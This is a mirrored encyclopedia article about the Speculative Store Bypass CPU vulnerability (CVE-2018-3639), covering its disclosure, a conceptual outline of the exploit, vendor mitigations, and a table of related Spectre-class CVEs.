Search

Speculative Store Bypass

Speculative Store Bypass (SSB) (CVE-2018-3639) is the name given to a hardware security vulnerability and its exploitation that takes advantage of speculative execution in a similar way to the Meltdown and Spectre security vulnerabilities.[1] It affects the ARM, AMD and Intel families of processors. It was discovered by researchers at Microsoft Security Response Center and Google Project Zero (GPZ).[2] After being leaked on 3 May 2018 as part of a group of eight additional Spectre-class flaws provisionally named Spectre-NG,[3][4][5][6] it was first disclosed to the public as "Variant 4" on 21 May 2018, alongside a related speculative execution vulnerability designated "Variant 3a".[7][1]

Details

Speculative execution exploit Variant 4,[8] is referred to as Speculative Store Bypass (SSB),[1][9] and has been assigned CVE-2018-3639.[7] SSB is named Variant 4, but it is the fifth variant in the Spectre-Meltdown class of vulnerabilities.[7]

Steps involved in exploit:[1]

  1. "Slowly" store a value at a memory location
  2. "Quickly" load that value from that memory location
  3. Utilize the value that was just read to disrupt the cache in a detectable way

Impact and mitigation

Intel claims that web browsers that are already patched to mitigate Spectre Variants 1 and 2 are partially protected against Variant 4.[7] Intel said in a statement that the likelihood of end users being affected was "low" and that not all protections would be on by default due to some impact on performance.[10] The Chrome JavaScript team confirmed that effective mitigation of Variant 4 in software is infeasible, in part due to performance impact.[11]

Intel is planning to address Variant 4 by releasing a microcode patch that creates a new hardware flag named Speculative Store Bypass Disable (SSBD).[7][2][12] A stable microcode patch is yet to be delivered, with Intel suggesting that the patch will be ready "in the coming weeks"[needs update].[7] Many operating system vendors will be releasing software updates to assist with mitigating Variant 4;[13][2][14] however, microcode/firmware updates are required for the software updates to have an effect.[13]

Speculative execution exploit variants

Summary of speculative execution variants[15][7][16][17]
VulnerabilityCVEExploit namePublic vulnerability nameCVSS v2.0CVSS v3.0
Spectre2017-5753Variant 1Bounds Check Bypass (BCB)4.75.6
Spectre2017-5715Variant 2Branch Target Injection (BTI)4.75.6
Meltdown2017-5754Variant 3Rogue Data Cache Load (RDCL)4.75.6
Spectre-NG2018-3640Variant 3aRogue System Register Read (RSRR[18])4.75.6
Spectre-NG2018-3639Variant 4Speculative Store Bypass (SSB)4.95.5
Spectre-NG2018-3665Lazy FP State Restore4.75.6
Spectre-NG2018-3693Bounds Check Bypass Store (BCBS)4.75.6
Foreshadow2018-3615Variant 5L1 Terminal Fault (L1TF)5.46.4
Foreshadow-NG2018-36204.75.6
Foreshadow-NG2018-36464.75.6

References

See also

Retrieved from "https:https://www.search.com.vn/wiki/index.php?lang=en&q=Speculative_Store_Bypass&oldid=1232794803"
🔥 Top keywords: Main PageSpecial:SearchPage 3Wikipedia:Featured picturesHouse of the DragonUEFA Euro 2024Bryson DeChambeauJuneteenthInside Out 2Eid al-AdhaCleopatraDeaths in 2024Merrily We Roll Along (musical)Jonathan GroffJude Bellingham.xxx77th Tony AwardsBridgertonGary PlauchéKylian MbappéDaniel RadcliffeUEFA European Championship2024 ICC Men's T20 World CupUnit 731The Boys (TV series)Rory McIlroyN'Golo KantéUEFA Euro 2020YouTubeRomelu LukakuOpinion polling for the 2024 United Kingdom general electionThe Boys season 4Romania national football teamNicola CoughlanStereophonic (play)Gene WilderErin DarkeAntoine GriezmannProject 2025